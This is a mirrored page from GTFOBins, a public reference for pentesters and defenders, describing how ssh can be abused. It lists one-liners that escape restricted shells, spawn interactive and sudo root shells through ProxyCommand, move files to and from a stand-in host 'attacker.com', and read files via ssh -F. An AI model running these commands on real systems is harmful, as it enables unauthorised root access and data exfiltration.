public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-10-23 00:57:56 +02:00
Code Issues Projects Releases Wiki Activity
80b20b6991
GTFOBins.github.io/_gtfobins/ssh.md
Emilio Pinna 7e5bcab249 Replace where_to_save with file_to_save
2018-06-04 18:53:35 +01:00

1.1 KiB
Raw Blame History

functions
execute-interactive sudo-enabled download upload file-read
description code
Reconnecting may help bypassing restricted shells. ssh localhost $SHELL --noprofile --norc
description code
Spawn interactive shell through ProxyCommand option. ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
description code
Spawn interactive root shell through ProxyCommand option. sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
description code
Fetch a remote file from a SSH server. HOST=user@attacker.com RPATH=file_to_get LPATH=file_to_save ssh $HOST "cat $RPATH" > $LPATH
description code
Send local file to a SSH server. HOST=user@attacker.com RPATH=file_to_save LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH
description code
The read file content is corrupted by error prints. LFILE=file_to_read ssh -F $LFILE localhost